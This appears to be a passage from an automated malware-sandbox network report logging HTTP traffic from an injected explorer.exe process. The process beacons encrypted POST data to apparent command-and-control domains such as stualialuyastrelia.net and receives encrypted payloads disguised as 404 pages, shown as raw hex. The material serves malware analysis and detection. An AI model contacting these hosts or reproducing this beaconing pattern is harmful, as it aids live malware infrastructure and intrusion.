                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=a4d560d918d2aae13cbcc62f1d8d326b|149.18.24.110|1701479197|1701479197|0|1|0; path=/; domain=.lightseinsteniki.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=149.18.24.110; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                3192.168.2.64971934.143.166.163804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:39.824539900 CET330OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://ocinykkysevrsyc.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 131
                                                                                                                                                                                                                                                                                                                Host: liuliuoumumy.org
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:39.824568987 CET185OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 a6 a2 05 c7
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bOc,8SFnpyJ)1LItO
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:40.362673044 CET472INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:40 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=6082e614e1d3210bf57c48935046a82b|149.18.24.110|1701479200|1701479200|0|1|0; path=/; domain=.liuliuoumumy.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=149.18.24.110; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                4192.168.2.64972091.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:40.819637060 CET333OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://rqrupmmpekog.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 191
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:40.819658995 CET245OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8b ce 20 e8
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bO o52FS&nd9"2h.7"|+K>~>Bq`QnL\#r9X<+b]D
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.063951015 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:40 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 31 66 36 36 0d 0a 18 00 00 00 1f 3d 5c a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 8b 3e 6c 0d a7 1b 52 86 af 2f 77 aa 83 0a 43 00 39 77 0d e0 2f 81 e6 89 73 59 a7 7d 68 54 09 6d 9a 1d 31 84 ec ba e2 a7 40 9f 98 15 d4 f0 30 2a 63 2f 26 3c c7 4d 8c 99 39 6c 3d 53 47 c2 9e 39 be 29 8d 28 26 61 f2 3c 8d ce 02 b5 cf 78 62 e5 a5 c1 90 5c 2d ab ee 05 93 38 52 fe 4e 35 05 dc 44 49 ab a0 3f 72 54 62 f6 a4 60 d1 17 4b 2b 97 4b 52 9a 18 6b 6f 52 3a dc ee 4b ce a5 5c 42 10 ea f6 7a fe 3c b9 4c 8c 72 cf 3f 43 a1 b2 6f 0a 0a ca 4e 25 6f 4c 3a 3d b2 5c e8 84 fd bc 6d e2 dc a1 a7 f4 73 93 20 fc 0c 82 88 12 f7 a3 ef 06 14 ad 02 3a 46 8a 0d a9 07 fa 67 45 f6 23 fc 4b 2c be 78 bf 55 36 4c 3d f5 3c 42 3e 7d e8 28 7a 3a 34 d7 41 b4 90 2c a6 59 58 e5 62 09 eb 95 5a b7 ba c5 09 16 be 03 bb 2b 37 b1 3e a1 b3 1b c7 8b ef 77 04 77 3f 6c df 89 82 9b 28 97 e9 b0 ea 24 de c0 49 60 55 8c df 1a 73 e8 78 31 3e 8b 58 94 82 3e 37 59 63 c3 36 e3 3a 2f b3 b6 09 fb 7f f3 8f 1b fc 26 28 bc fd 33 3f 89 5e bf f1 0e 63 62 99 63 9d 20 36 fe f0 a2 86 2c 4b 78 f2 b4 2c d4 ce 13 c4 2d ca 95 3a d9 64 6d 54 b3 5c 76 2c 4e 89 f7 3d 58 4d f5 12 8b 75 0c f8 cd 2b 7d 30 c0 2b fe 21 2a 7f 15 6d 3f 16 9e 01 b5 69 eb 9d ed 8d ee 41 d5 45 24 19 4b 1f 52 f1 9d 79 17 9b a4 e5 ab ea fc 39 44 e6 f0 63 b3 34 62 01 f0 92 0e 5e fc fd 8a c8 9b 10 5f 47 d8 54 31 a2 2b c6 4d 36 cd 60 df d8 4f c5 44 25 78 20 ef 1b 08 ad 5d 35 d1 7a 05 c7 57 dd b3 46 91 4a 01 92 a0 31 f3 b6 5f 99 74 c0 c9 f3 12 b1 02 66 86 b1 ad f1 8b 14 d9 ea 1a 24 e9 4e d1 15 f3 a9 1c c4 16 d5 e6 00 a7 09 17 b6 de 40 6b c3 fd cf f3 3b 5b 4a 76 fb 4d fa 6a d1 2c c1 e0 7e 1b 2b c0 11 6e b8 9d 9a fa 03 03 c5 6c 91 63 12 49 53 b1 0f 30 36 77 1f f7 e6 87 ad 05 de 93 db fc 4e f1 69 be e5 e3 9e e3 56 da ef ef 8a c8 40 39 ae 15 4f ce b3 12 7c 8e 6a 18 41 66 35 99 7e 83 84 08 cd ee cf cd 9b da 0d 58 73 6c 8a 96 03 37 fa 43 43 fe a8 50 75 48 e9 60 17 4c aa 25 df a1 a9 6a b9 d6 d6 a4 62 e8 a9 b7 76 79 f1 50 93 7c 2c e6 d0 49 56 e1 d6 47 59 19 7d 27 84 22 66 13 de 9e 1f a0 7c 85 2b dc ef 24 3b 92 33 8d a6 52 d2 8e 29 80 d0 f3 4f b5 e2 72 22 4d 9a 70 ea 84 bd 7e 69 94 5b c4 f6 01 42 7c ee a7 84 cd 7a 58 39 62 79 cf f7 6f e9 d6 eb 85 59 0e 75 06 d1 04 8d d7 af 40 60 76 57 c4 2d 70 c6 b0 57 ad 50 f1 57 80 a0 a2 04 10 a1 2f 49 6d 26 b4 91 24 df 14 8f b6 65 b1 49 70 9f 31 03 96 8c 54 0a 5b 2c 95 a1 8e bd 1f f3 f5 56 7e 79 48 59 a9 3d 78 ed 6f 4f 33 13 20 7a ad f0 83 08 17 2f f1 27 a6 d0 f2 c0 9d 2a 19 c8 4b 73 42 fb 6d 8e 46 46 5e 76 11 29 3e c1 4b 58 80 22 17 75 a5 9a cb a2 29 73 76 ff 45 a7 3e 33 23 bd eb 32 16 b9 e2 67 6e f1 5c 47 79 b8 5a de 69 7e 2e bf 3c 4d bb fb 2a 1b c5 0c e4 c6 60 15 56 38 18 d5 f9 83 7f a0 63 2f d2 f0 46 65 73 fe 74 89 c7 8b 39 3e db 7d 26 f1 9c 20 e5 d4 19 85 0e 0c 22 4b 08 f1 72 8e 91 31 8c 96 e7 6c f0 0e 8c 92 98 23 9c d0 f4 a2 22 95 79 ad ce ab 6e 3e 6f 41 03 5a 3a 9a 95 d0 37 fb 9a d3 c8 f4 ce fb 4e 34 c8 e9 fc 81 7d 09 69 48 c2 51 34 c8 80 56 30 90 62 42 15 4d 94 8d 70 58 ca 82 cd ca 50 85 73 ba 57 b4 49 5d a5 0c 36 7c 83 c6 7d b7 dd 34 16 96 9c e6 03 4d 95 bf a4 56 a4 5e 0d 3c 90 c5 d0 f5 93 fc 59 fe 37 8d 84 3b 7a 0d 21 42 ad ec 32 91 72 d6 70 e7 13 d5 b4 a0 15 fc 01 dd dc 99 a7 49 7c 2b 04 07 27 89 89 72 3c 26 42 c1 db a2 96 1f d8 29 e9 38 70 78 f1 df 3e c7 fb 0b 6a a9
                                                                                                                                                                                                                                                                                                                Data Ascii: 1f66=\7f0|gW5p@E74o8>lR/wC9w/sY}hTm1@0*c/&<M9l=SG9)(&a<xb\-8RN5DI?rTb`K+KRkoR:K\Bz<Lr?CoN%oL:=\ms :FgE#K,xU6L=<B>}(z:4A,YXbZ+7>ww?l($I`Usx1>X>7Yc6:/&(3?^cbc 6,Kx,-:dmT\v,N=XMu+}0+!*m?iAE$KRy9Dc4b^_GT1+M6`OD%x ]5zWFJ1_tf$N@k;[JvMj,~+nlcIS06wNiV@9O|jAf5~Xsl7CCPuH`L%jbvyP|,IVGY}'"f|+$;3R)Or"Mp~i[B|zX9byoYu@`vW-pWPW/Im&$eIp1T[,V~yHY=xoO3 z/'*KsBmFF^v)>KX"u)svE>3#2gn\GyZi~.<M*`V8c/Fest9>}& "Kr1l#"yn>oAZ:7N4}iHQ4V0bBMpXPsWI]6|}4MV^<Y7;z!B2rpI|+'r<&B)8px>j
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.064014912 CET1340INData Raw: 20 b5 83 8f ce c8 66 c5 57 bf b8 da a6 60 38 92 c4 04 f6 cc 46 bd 8a 94 a0 75 c2 1e 20 75 c2 9e a2 e5 8b 43 a3 3d c2 11 a2 a1 3e aa d0 63 97 97 8c 7c 09 4d de d5 1f e8 32 6c 17 91 cd a6 b1 ef 6a bb 2c 61 3c a3 64 65 32 0b b0 07 9a 5a a7 0a 52 44
                                                                                                                                                                                                                                                                                                                Data Ascii: fW`8Fu uC=>c|M2lj,a<de2ZRD@7I~2Xwc`cs&)2G(Nn.X4gx?04rMo[;KX06}]pU]%(9g]F[!'if\Ts)z
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.064052105 CET1340INData Raw: 96 63 fd 15 63 42 c2 68 9a 8e 32 09 24 6a 18 ac 94 67 d9 21 1c e5 b3 35 16 f1 20 6b bb ed 7e e2 e0 c3 89 5c 2f 86 38 6d e5 35 c5 2a 33 ab b5 af db 01 e8 f6 1e ba 4c 58 f8 c4 54 7e 45 89 54 7e d6 f0 13 e6 7e ca fb 0d 3b cb 4b c4 4d b5 6d 84 f2 bb
                                                                                                                                                                                                                                                                                                                Data Ascii: ccBh2$jg!5 k~\/8m5*3LXT~ET~~;KMm{8lN4P<mpdhKcgJq4.]R8ej965ck1DsM%P^e)-5W:66$7'}Lj[3;9Oyyw;3W1b()
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.064093113 CET1340INData Raw: f8 8c fe af 93 87 52 0a 60 74 1d e5 8f 0c f4 23 60 2e 0a 8f fe 46 9c 23 72 df 43 cb 1d 75 d7 59 e5 79 d6 c3 20 68 bb 5f 88 af fa 3e aa 25 70 fe 63 8c a9 96 08 cb cf 36 26 d0 06 9d 5b d1 97 e9 d1 7e 9e 1a 64 16 c3 25 57 9b 12 3e d0 8b 43 76 44 39
                                                                                                                                                                                                                                                                                                                Data Ascii: R`t#`.F#rCuYy h_>%pc6&[~d%W>CvD99@l(\e-U #nm,Z|I W];,B1z~6F Kz}fF 4v9k`HZ/O=Iy1 o>kCT|?+hkq+R<`6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.064127922 CET1340INData Raw: ff 6f 02 f6 2f 2d 90 e2 e6 dd ab 7a a6 da d8 dd 7f cc ba e6 bb 6c b6 fc 1a 83 25 81 96 69 c0 be 97 ed c3 b2 07 73 e7 69 92 a1 3b 73 30 93 b7 36 d6 c9 f3 c7 e3 2e f1 bd cb 0f 61 a0 0a 97 9e 40 5b 5d 23 27 4d 30 31 5f 56 eb 52 fa db 74 ce 6b c7 a6
                                                                                                                                                                                                                                                                                                                Data Ascii: o/-zl%isi;s06.a@[]#'M01_VRtkCuv.`lC3M.QdvL_KKo T:>t&^]b-6I_Shah*#|sW[M:w0F%$yJ>3t\jS\Z!
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.064165115 CET1340INData Raw: 38 ca 47 40 42 3c 2d e0 9f d1 21 78 38 fb 0d a1 18 5d 14 f5 c9 3a e6 2b e0 95 93 40 cb c8 24 a1 3d fd e8 f3 2b 84 3f d5 6a 1c 15 e8 1e 1a a3 17 33 2c 5a 1f 23 1a 81 2c 71 81 7b 99 ef 8d df 82 9b 69 4e cb 1c 44 24 48 3e 58 b2 2d 88 8f 54 5f f8 d6
                                                                                                                                                                                                                                                                                                                Data Ascii: 8G@B<-!x8]:+@$=+?j3,Z#,q{iND$H>X-T_HNf]~B|Zjx)R|y2DBR B*Vuqm^ATQ`oVP"oXFwCf-%{+)27O_on]2Ozmw
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.064201117 CET1340INData Raw: 1b c8 af d6 5e 17 b7 e1 60 fc e9 f8 25 b2 53 d4 f8 1b f0 d4 dd 79 a9 0e cc 03 68 df 76 a8 57 3a ef 8e 06 3c fe fd 2e 1d bd dd ec 83 a3 13 95 99 f5 20 f8 84 5f ac 3f 83 90 d8 f7 b4 db 8c 62 cb 0e 09 f5 0a 08 90 17 85 b3 18 b4 85 60 ed 0c c4 16 d4
                                                                                                                                                                                                                                                                                                                Data Ascii: ^`%SyhvW:<. _?b`%h8!?5qIZYv~]8HKgLufxV#sf]:rWWAc:=z[7cS8t~s/ht,txuWHEHYzHZ
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.064237118 CET1340INData Raw: 69 1e 79 51 23 c4 46 9f 19 ca b8 28 f5 98 c1 e3 1d b8 dd c8 35 9f 98 d3 6e 55 80 6e 66 7a 91 fd e6 42 d8 31 94 c5 8c 53 98 ce 85 80 a6 2c b2 91 9e 9f fd e3 f4 42 b3 db 64 f3 e0 22 04 65 94 51 15 43 ce 5d 19 c8 3e 8c 31 d7 d2 01 01 43 b5 6d 9d a1
                                                                                                                                                                                                                                                                                                                Data Ascii: iyQ#F(5nUnfzB1S,Bd"eQC]>1CmB1Jq^vvh`+"?%HjBB_hv[3f\X:,'B?#)K;VdpW4R=sA^g%1\<Gy
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.064274073 CET1340INData Raw: 1e f9 2f dc 67 49 e8 0b 98 33 a7 4e dd dd 24 35 ca 3f 73 8e 0a 43 8f a2 8c 6f 94 9f 0a ee 8b b2 00 f7 9a 7a 75 24 de bc ee ac a2 6c 54 68 1a ac d7 20 1c cf 01 83 da d0 7d 3b 4f 56 15 f2 09 a2 b4 8c 2c b4 cb af 34 c0 3c a5 16 03 22 0b d1 f4 90 12
                                                                                                                                                                                                                                                                                                                Data Ascii: /gI3N$5?sCozu$lTh };OV,4<"|,ulfJE|SN0(g_"UXT_J<Zzy%/R,?u\d< JMY0yJEyep7v2l6J]XPxvB+Upf]hV\$r+2
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:41.064333916 CET1340INData Raw: aa 02 c0 2f b9 32 2f 7b ff 3e c6 b2 c9 17 74 f1 7e 7e 80 c7 f4 ef 7a d7 dd 0b 67 0a ce 39 0c a9 ec ef 8a 1e d4 97 c8 74 62 e0 91 c6 f8 52 3a 50 aa d9 ff 58 73 c1 c5 44 a2 c4 12 cf 72 29 11 aa 5d 1c 3b b8 41 fe ec 9f ec 98 f0 79 3b 6f 5d 68 f3 a5
                                                                                                                                                                                                                                                                                                                Data Ascii: /2/{>t~~zg9tbR:PXsDr)];Ay;o]hDXGligPP*K/#[N,]=AwGx*(SSAzlyXBl'`?)VgLS|&Wee|WU!rivBGA?~,cx
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.011997938 CET332OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://tbdjkcycimo.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 209
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.254599094 CET653INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:42 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.266161919 CET335OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://giaqbvjkhqgfut.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 303
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.510076046 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:42 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.529789925 CET334OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://xwcyxjkovfsev.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 160
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:42.776132107 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:42 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 29 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 6e 5f e4 19 77 c0 f2 70 db 90 09 bc 07 03 d5 7f 8f 91 02 5e e0 3d 38 76 12 0f 89 fd 6b f3 d3 bf 20 ac 92 c9 ba da b7 c8 13 5a c4 b0 f3 f1 b1 72 3b 0a 90 f3 db a2 dd a4 78 ee 09 b5 27 7a 3b cf 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 78 8d 55 db c4 0d 13 13 bf 1e e1 92 24 08 4f c5 03 a1 cb a1 61 7e de f5 69 b9 19 17 7e 5f af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 ee 60 51 61 d6 d5 38 7c c0 00 a1 2d 6b a1 c0 4a 9a 03 fd ec 7e aa 79 8d 8c 2e b4 67 0d e0 5d bf 46 54 db f8 12 6c 33 6c d9 6d 0a 8d c7 ed e4 0e a4 db 7e 71 eb 80 f5 0a 68 8b 4a d8 19 be cc 4f 3e 79 82 ae 9c 97 02 4c 70 56 ad f3 57 3b 2a b9 72 7e ea 23 b2 65 0e 31 79 92 90 f7 dd f5 ec a7 72 2b 5c 80 d0 02 f9 13 63 11 ab d6 af 21 3c 27 d4 69 b7 9f 23 c9 cc 46 49 73 15 ac cb eb d9 55 a1 96 ba 68 1e 0e ff 9d 7f 6f 71 40 cf 62 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 aa 40 b1 b5 6c 10 51 dc 40 17 4b 9d 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f d4 6c 68 91 d8 29 06 f1 2c 5e ae 03 8b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 57 24 08 3b b8 b9 8b 8b f1 7c 7a d7 9c 98 c3 e0 2b 89 b4 bb 01 6a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 ed d0 d9 57 2e f2 87 7d bd 41 f5 52 13 c8 3a 96 4d fb e7 17 3f cc e5 7e 4d 96 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e df 96 ce ac 1b fc a2 d3 6c a8 ca d4 af 95 45 43 9c 15 03 62 18 8a 1b f8 40 ea ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f 8b e2 09 28 c8 71 4a ac 18 b8 77 b3 83 9b 9c 19 13 88 be 8c f5 08 8a 52 b9 31 ec 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 47 b2 52 1c 34 ec f8 6a 34 21 01 7d da 05 81 96 7f c8 0a 27 9d cf 3c 42 56 60 fa 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f 18 b6 b8 38 d0 c3 eb f4 02 7b 5e 32 84 86 f1 32 42 e2 1d 16 12 37 09 e9 17 00 a9 e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 56 b3 19 1d 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 01 28 2b 77 33 c3 00 45 3d 79 24 0d 1e eb 67 f9 7d d8 ef fe cd f0 a8 01 3f 26 58 c5 07 1f ad d6 46 43 7c 20 4b b2 cf dd a9 8c 29 02 3d 89 31 99 a5 13 01 6e 01 2e 10 72 c8 ad f4 ae e4 47 29 fb d8 a7 22 40 42 c1 6f 02 89 cc 05 81 55
